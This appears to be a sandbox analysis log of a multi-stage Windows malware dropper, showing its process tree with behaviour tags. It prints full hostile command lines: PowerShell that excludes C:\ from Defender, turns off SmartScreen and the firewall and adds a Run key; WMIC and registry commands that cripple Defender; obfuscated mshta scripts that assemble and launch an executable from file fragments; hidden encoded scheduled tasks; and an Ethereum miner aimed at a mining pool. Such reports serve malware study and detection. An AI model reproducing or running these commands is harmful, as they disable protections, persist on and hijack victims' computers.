C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe"C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe"C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im vRimKORg6sXDoijekzeZQRUR.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im vRimKORg6sXDoijekzeZQRUR.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\CV3wZcym4qGbTCJGIrRdV3Uq.exe"C:\Users\Admin\Documents\CV3wZcym4qGbTCJGIrRdV3Uq.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK9⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\UjMxALCgOD36c61XgfZBL0C9.exe"C:\Users\Admin\Documents\UjMxALCgOD36c61XgfZBL0C9.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 2647⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\GT4rJDknjBn1Q15NPVcLOGnM.exe"C:\Users\Admin\Documents\GT4rJDknjBn1Q15NPVcLOGnM.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\Mi7ACiBw_NKvp3OaVcQbL0ci.exe"C:\Users\Admin\Documents\Mi7ACiBw_NKvp3OaVcQbL0ci.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\filename.exe"C:\Users\Admin\AppData\Local\Temp\filename.exe"7⤵
- Checks BIOS information in registry
- Drops startup file
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)8⤵
- Modifies security service
- Adds Run key to start application
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe9⤵
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe10⤵
-
C:\ProgramData\UpSys.exe"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe11⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"12⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off9⤵
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Systemd\Database.exe-epool eth-eu1.nanopool.org:9999 -ewal 0x34B27139451244A628F226fF7405f7E79407B00A -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\9KzuhE7Lw8ZuxqLTgVWfZqc5.exe"C:\Users\Admin\Documents\9KzuhE7Lw8ZuxqLTgVWfZqc5.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\UjmEzzcdEw15G25sQGzbQOMX.exe"C:\Users\Admin\Documents\UjmEzzcdEw15G25sQGzbQOMX.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\3996938.scr"C:\Users\Admin\AppData\Roaming\3996938.scr" /S8⤵
-
C:\Users\Admin\AppData\Roaming\3308248.scr"C:\Users\Admin\AppData\Roaming\3308248.scr" /S8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\7105377.scr"C:\Users\Admin\AppData\Roaming\7105377.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1793412.scr"C:\Users\Admin\AppData\Roaming\1793412.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5981140.scr"C:\Users\Admin\AppData\Roaming\5981140.scr" /S8⤵
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\2Uz1J5c5sQRXrL2lNS7Xs_QF.exe"C:\Users\Admin\Documents\2Uz1J5c5sQRXrL2lNS7Xs_QF.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\3SIZP_yBJOASbSHbQAH4kgIc.exe"C:\Users\Admin\Documents\3SIZP_yBJOASbSHbQAH4kgIc.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\t6fnIyPK4SEmcNK1OEvBGBKz.exe"C:\Users\Admin\Documents\t6fnIyPK4SEmcNK1OEvBGBKz.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\WXhP7Lj7noVP0ru01p2gZwdG.exe"C:\Users\Admin\Documents\WXhP7Lj7noVP0ru01p2gZwdG.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"7⤵
-
C:\Users\Admin\Documents\63GomkqnXl4IWFjZRSn9geJ5.exe"C:\Users\Admin\Documents\63GomkqnXl4IWFjZRSn9geJ5.exe"8⤵
-
C:\Users\Admin\Documents\tWc9G0DT4j9vMtoJgQmAokMM.exe"C:\Users\Admin\Documents\tWc9G0DT4j9vMtoJgQmAokMM.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\tWc9G0DT4j9vMtoJgQmAokMM.exe"C:\Users\Admin\Documents\tWc9G0DT4j9vMtoJgQmAokMM.exe"9⤵
-
C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe"C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\Admin\Documents\xBuRtBDpUgKPEpv6Qbm_x2j9.exe" ) do taskkill /f -Im "%~nXw"10⤵
-
C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) )12⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -Im "xBuRtBDpUgKPEpv6Qbm_x2j9.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\NRd34BHQASvHQ4Mko5Ateaw4.exe"C:\Users\Admin\Documents\NRd34BHQASvHQ4Mko5Ateaw4.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpBC41_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpBC41_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpBC41_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpBC41_tmp.exe10⤵
-
C:\Users\Admin\Documents\7DrghgbkgI2jLUHFNgq_bxXK.exe"C:\Users\Admin\Documents\7DrghgbkgI2jLUHFNgq_bxXK.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 2369⤵
- Program crash
-
C:\Users\Admin\Documents\eInAfAAnadxOn3g6O89Cb5FT.exe"C:\Users\Admin\Documents\eInAfAAnadxOn3g6O89Cb5FT.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 17369⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\SgfJUJN11IroPHvivngzyLg1.exe"C:\Users\Admin\Documents\SgfJUJN11IroPHvivngzyLg1.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 2369⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe"C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\1n_ss7XlOu1cTBk10KK6KyVd.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "1n_ss7XlOu1cTBk10KK6KyVd.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\FqXp9izM6tdgKrP4sV7pt7YU.exe"C:\Users\Admin\Documents\FqXp9izM6tdgKrP4sV7pt7YU.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSA464.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC0C5.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
- Enumerates system info in registry
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXHlxiYIv" /SC once /ST 01:25:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 11:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\SNRcYjF.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\XvFe4GzJul_YZ2OFsGeMoF0i.exe"C:\Users\Admin\Documents\XvFe4GzJul_YZ2OFsGeMoF0i.exe" silent8⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Documents\h9qXJLEbV8pRQS5MPg58kADw.exe"C:\Users\Admin\Documents\h9qXJLEbV8pRQS5MPg58kADw.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LD7TG.tmp\h9qXJLEbV8pRQS5MPg58kADw.tmp"C:\Users\Admin\AppData\Local\Temp\is-LD7TG.tmp\h9qXJLEbV8pRQS5MPg58kADw.tmp" /SL5="$1053E,506127,422400,C:\Users\Admin\Documents\h9qXJLEbV8pRQS5MPg58kADw.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-C1HBJ.tmp\Sharefolder.exe"C:\Users\Admin\AppData\Local\Temp\is-C1HBJ.tmp\Sharefolder.exe" /S /UID=270910⤵
-
C:\Program Files\Reference Assemblies\OCTJCKLXKU\foldershare.exe"C:\Program Files\Reference Assemblies\OCTJCKLXKU\foldershare.exe" /VERYSILENT11⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\86-58f3c-b3d-d7f9b-fe661bfec6a31\Katedupabe.exe"C:\Users\Admin\AppData\Local\Temp\86-58f3c-b3d-d7f9b-fe661bfec6a31\Katedupabe.exe"11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
-
